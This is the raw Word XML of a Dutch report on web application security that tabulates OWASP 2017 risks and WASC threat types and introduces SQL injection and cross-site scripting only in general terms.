              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Impact software</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64767C08" w14:textId="394BD7EE" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Impact business</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1788" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="30813824" w14:textId="4D32EDFC" w:rsidR="001A6DC7" w:rsidRDefault="001A6DC7">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>moeilijkheidsgraad</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="7C522CD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2290F5AD" w14:textId="6A9D554D" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="69364E06" w14:textId="66F60FA8" w:rsidR="001A6DC7" w:rsidRDefault="0001685A">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Vaak</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1644" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="635C344A" w14:textId="6208A632" w:rsidR="001A6DC7" w:rsidRDefault="0001685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634EDB3D" w14:textId="2ACA2EF1"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441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="633DA3A0" w14:textId="41B88434"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788" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="4EBB239D" w14:textId="14F78A54" w:rsidR="001A6DC7" w:rsidRDefault="00741CC0">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="19DD8750"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275C2149" w14:textId="63F13C47" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="778F99D5" w14:textId="0CD74940"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5B0D7D48" w14:textId="425E280B"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2F8C2B91" w14:textId="7EFDBA2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2F702F8C" w14:textId="0E4EC78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7DDCC77A" w14:textId="12691275"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r>
      <w:tr w:rsidR="001A6DC7" w14:paraId="48BAF73B"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7FD9465D" w14:textId="74421963" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="629CC26E" w14:textId="735D5E0E" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">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32DBE2E8" w14:textId="4A3C441F" w:rsidR="001A6DC7" w:rsidRDefault="0073782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89CBC2B" w14:textId="08C4DE2E"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441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="6FEB87F3" w14:textId="351100AD"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39CB564F" w14:textId="5B328B7D" w:rsidR="001A6DC7" w:rsidRDefault="00E2354C">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="52FD85A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79E64B9E" w14:textId="2F0429E2" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47AB66CD" w14:textId="0D24318D"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1593B48C" w14:textId="5A38A2FD" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">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E820BD1" w14:textId="40FDA912"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E0C2A2A" w14:textId="5FFAB785"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73BA73E8" w14:textId="49034ED0" w:rsidR="001A6DC7" w:rsidRDefault="0073782A">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Moeilijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001A6DC7" w14:paraId="576A1E3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1ACD30D4" w14:textId="2A7710CC" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="62FCAFE1" w14:textId="6D478A57" w:rsidR="001A6DC7" w:rsidRDefault="00E3764D">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12F439A3" w14:textId="78EBF746" w:rsidR="001A6DC7" w:rsidRDefault="00E3764D">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E53CF19" w14:textId="0ED13A02"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c>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="303CC45B" w14:textId="3DE6910B" w:rsidR="001A6DC7" w:rsidRDefault="006672F3">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26459B78" w14:textId="52A35BE6"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r>
      <w:tr w:rsidR="001A6DC7" w14:paraId="5B01E428"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6D3D08F3" w14:textId="43F1D8EB" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D15F2BC" w14:textId="3D7C821D" w:rsidR="001A6DC7" w:rsidRDefault="006672F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6E0DC619" w14:textId="3BF6BDF7"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c>
          <w:tcPr>
            <w:tcW w:w="1451" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2175A8F1" w14:textId="01681D03"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39DEE2C5" w14:textId="7B2153DE"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36AE6267" w14:textId="0F7E35D5"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r>
      <w:tr w:rsidR="001A6DC7" w14:paraId="09372BC0"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7D030F" w14:textId="26FB0A7B" w:rsidR="001A6DC7" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="729AAB18" w14:textId="4ADAD04F" w:rsidR="001A6DC7"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32A2AC62" w14:textId="3D53317C"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25BBFE66" w14:textId="0C653C21"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381B5DE1" w14:textId="1A7484B0"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0CED5DE1" w14:textId="2D48D79C" w:rsidR="001A6DC7"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45746" w14:paraId="3E636056"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5F5A1E29" w14:textId="09D6B70E" w:rsidR="00245746" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F43FE23" w14:textId="1E7170CA" w:rsidR="00245746" w:rsidRDefault="00A51EA9">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0E794621" w14:textId="215FFB7D" w:rsidR="00245746" w:rsidRDefault="00081392">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D84296B" w14:textId="66C0B733" w:rsidR="00245746" w:rsidRDefault="00A51EA9">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235C803" w14:textId="251E5249" w:rsidR="00245746" w:rsidRDefault="00BC4CD0">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5446E245" w14:textId="093FEB90" w:rsidR="00245746" w:rsidRDefault="00A51EA9">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Makkelijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245746" w14:paraId="395A3262"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35F159" w14:textId="7437B691" w:rsidR="00245746" w:rsidRDefault="00245746">
            <w:r>
              <w:t>A9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6378BF1E" w14:textId="138FA9CC" w:rsidR="00245746"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2A48CF4C" w14:textId="2B8E10DE"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46455194" w14:textId="15366D52"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6C5772BB" w14:textId="1BDDFCD0"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71D95336" w14:textId="3AAC4884" w:rsidR="00245746"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32C33" w14:paraId="22525B9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383D4428" w14:textId="0E493CBA" w:rsidR="00232C33" w:rsidRDefault="00232C33" w:rsidP="00232C33">
            <w:r>
              <w:t>A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2034" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="216C8A46" w14:textId="55FFAC39" w:rsidR="00232C33" w:rsidRDefault="00232C33" w:rsidP="00232C3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5C016DCE" w14:textId="14976159"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3DDE5187" w14:textId="0E7E61E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14EA6BC8" w14:textId="217FD60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003592EE" w14:textId="4043B4D2" w:rsidR="00232C33" w:rsidRDefault="00232C33" w:rsidP="00232C33">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Moeilijk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42C01BD0" w14:textId="3CAA77C1" w:rsidR="00A94B1E" w:rsidRDefault="002F0F65">
      <w:r>
        <w:t xml:space="preserve">Tabel 3.3 </w:t>
      </w:r>
      <w:r w:rsidR="00A94B1E">
        <w:t>(OWASP detail pagina’s van risico’s, 2017)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E224A1" w14:textId="6B462228" w:rsidR="0079562A" w:rsidRDefault="0079562A"/>
    <w:p w14:paraId="7C18449D" w14:textId="22F2000F" w:rsidR="00447F98" w:rsidRDefault="00904937">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301DFF6C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-897853</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1010285</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4570A" id="Rectangle 461" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.7pt;margin-top:-79.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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002777CC">
        <w:t xml:space="preserve">In tabel 3.3 kun je </w:t>
      </w:r>
      <w:r w:rsidR="00BC4CD0">
        <w:t xml:space="preserve">aan </w:t>
      </w:r>
      <w:r w:rsidR="002777CC">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2C6AC418" w:rsidR="00D96689" w:rsidRPr="00D173C6" w:rsidRDefault="006A33B8" w:rsidP="006A33B8">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>3.2.2</w:t>
      </w:r>
      <w:r w:rsidR="00FE6C9B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E848BF">
        <w:t xml:space="preserve">OWASP </w:t>
      </w:r>
      <w:r w:rsidR="00622A99">
        <w:t>Kwetsbaarheden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44031CB4" w14:textId="23B2A0E0" w:rsidR="00E12430" w:rsidRPr="008C7B6A" w:rsidRDefault="007A55BC" w:rsidP="00167992">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7B6A">
        <w:t xml:space="preserve">A1 </w:t>
      </w:r>
      <w:r w:rsidR="00F65ACF" w:rsidRPr="008C7B6A">
        <w:t>injectie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CBB771" w14:textId="4C291EBC"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6606565C"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E2204E" w:rsidRPr="003808D6" w:rsidRDefault="00E2204E"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6"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JQ8EYY3AgAAbAQAAA4AAAAAAAAAAAAA&#10;AAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhABR5B5vfAAAACgEAAA8AAAAAAAAA&#10;AAAAAAAAjwQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACbBQAAAAA=&#10;" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="1E47D233" w14:textId="3A137D16" w:rsidR="00E2204E" w:rsidRPr="003808D6" w:rsidRDefault="00E2204E"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3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E2204E" w:rsidRDefault="00E2204E"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7"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FJTeBskAgAAJQQAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2Mu&#10;eG1sUEsBAi0AFAAGAAgAAAAhAOq49FrgAAAACwEAAA8AAAAAAAAAAAAAAAAAfAQAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPMAAACJBQAAAAA=&#10;" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3C10F22F" w14:textId="39719AA2" w:rsidR="00E2204E" w:rsidRDefault="00E2204E" w:rsidP="00271A19">
                      <w:pPr>
                        <w:jc w:val="center"/>
                      </w:pPr>
                      <w:r>
                        <w:t>Met SQL taal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E2204E" w:rsidRDefault="00E2204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8"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" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0ADFBF2C" w14:textId="2ABF1F9D" w:rsidR="00E2204E" w:rsidRDefault="00E2204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BB25835" w:rsidR="0049510C" w:rsidRDefault="0049510C" w:rsidP="0049510C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E3F7928" w14:textId="2D91D99A" w:rsidR="003641BC" w:rsidRDefault="00762EF7" w:rsidP="0049510C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252801024" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="060DA004" wp14:editId="74A54357">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-896958</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-897674</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E4CAD" id="Rectangle 669" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.65pt;margin-top:-70.65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" fillcolor="#eae655" strokecolor="#ebe755" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00C1656A">
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidR="007F6D2C">
        <w:t xml:space="preserve">oorbeelden </w:t>
      </w:r>
      <w:r w:rsidR="009F70F3">
        <w:t>van een</w:t>
      </w:r>
      <w:r w:rsidR="003641BC">
        <w:t xml:space="preserve"> SQL Injectie</w:t>
      </w:r>
      <w:r w:rsidR="00F87F60">
        <w:t xml:space="preserve"> in PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318264F9" w14:textId="0652B261"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Voor meer informatie over SQL injectie refereer ik u naar Bijlage A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72687873" w14:textId="2CC48584" w:rsidR="0049510C" w:rsidRDefault="0049510C" w:rsidP="00080EC5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="755E28FF" w14:textId="69571943" w:rsidR="005D1BBF" w:rsidRPr="008C7B6A" w:rsidRDefault="006A7123" w:rsidP="00080EC5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="008C7B6A">
        <w:t>A3 XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2596C95C" w14:textId="74E38A0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3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3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E2204E" w:rsidRPr="00500E88" w:rsidRDefault="00E2204E"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9"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" fillcolor="#f2f2f2 [3052]" strokecolor="black [3200]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="438B81CB" w14:textId="7A35B497" w:rsidR="00E2204E" w:rsidRPr="00500E88" w:rsidRDefault="00E2204E" w:rsidP="00500E88">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00500E88">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="28"/>
                        </w:rPr>
                        <w:t>Cross-site scripting</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="margin"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00395AA9">
        <w:t>Voor het verrichten van een XSS aanval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E2204E" w:rsidRPr="00CF1B56" w:rsidRDefault="00E2204E"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50"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AjmTg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" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="21E49B16" w14:textId="454B105A" w:rsidR="00E2204E" w:rsidRPr="00CF1B56" w:rsidRDefault="00E2204E"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8369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43AF044B" w14:textId="638625D8" w:rsidR="008C70DE" w:rsidRDefault="00F57C43" w:rsidP="008C70DE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>De webbrowser stuurt de data van de niets vermoedende gebruiker naar de hacker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299BE9D6" w14:textId="77777777" w:rsidR="00CC24CB" w:rsidRDefault="00CC24CB"/>
    <w:p w14:paraId="59EE0ED1" w14:textId="777466F6" w:rsidR="008C0FFD" w:rsidRPr="008E50BA" w:rsidRDefault="008C0FFD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E50BA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B43ECA" w14:textId="46EFACD9"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59627"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GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4678"/>
      </w:tblGrid>
      <w:tr w:rsidR="004B55A6" w14:paraId="34258A2D"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ABF010" w14:textId="77777777" w:rsidR="004B55A6" w:rsidRDefault="004B55A6" w:rsidP="008E50BA">
            <w:r>
              <w:t>Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004B55A6" w:rsidRPr="00F12D3B" w14:paraId="044EC9A5"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4B5F85">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>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2DB23D6B" w:rsidR="00DD7292" w:rsidRPr="00A46B43" w:rsidRDefault="00294937" w:rsidP="00C41D9B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Table 3.4</w:t>
      </w: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GridTable4-Accent4"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1043"/>
        <w:gridCol w:w="4072"/>
        <w:gridCol w:w="3947"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C4355C" w14:paraId="0FB24774" w14:textId="09E801AE"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FE6F45E" w14:textId="6DF30BB9" w:rsidR="00C4355C" w:rsidRDefault="00C4355C" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WACS ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A39A897" w14:textId="79B295B7" w:rsidR="00C4355C" w:rsidRDefault="00C4355C" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Threats type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3947" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24952BEE" w14:textId="2FED9826" w:rsidR="00C4355C" w:rsidRDefault="00C4355C" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="096B766F" w14:textId="09C31A63"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56BEF4D" w14:textId="6A4197DE" w:rsidR="00C4355C" w:rsidRDefault="007F5385" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-42</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58C845B9" w14:textId="05A76422"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1CD80209" w14:textId="26BA358C" w:rsidR="00C4355C" w:rsidRDefault="00FF14C4" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Abuse of functionality</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="6B208109" w14:textId="25D2E458" w:rsidTr="004B5F85">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AAB2603" w14:textId="06926D5C" w:rsidR="00C4355C" w:rsidRDefault="00210DAB" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12DE28F2" w14:textId="6B2B4FDD"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268ECBFA" w14:textId="47D2ADA1" w:rsidR="00C4355C" w:rsidRDefault="00FF14C4" w:rsidP="00C41D9B">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="0CDEF67C" w14:textId="4F33FEA6"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SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C4355C" w14:paraId="0B5647C3" w14:textId="28EBB863" w:rsidTr="004B5F85">
        <w:tc>
          <w:tcPr>
            <w:cnfStyle w:val="001000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            <w:tcW w:w="1043" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60A2A4DF" w14:textId="0F7C7AD5" w:rsidR="00C4355C" w:rsidRDefault="00564AD5" w:rsidP="00C41D9B">
            <w:r>
              <w:t>WASC-12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4072" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A9BF732" w14:textId="14999D7A"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760D73DF" w14:textId="619344FC" w:rsidR="00C4355C" w:rsidRDefault="00FF14C4" w:rsidP="00C41D9B">
            <w:pPr>
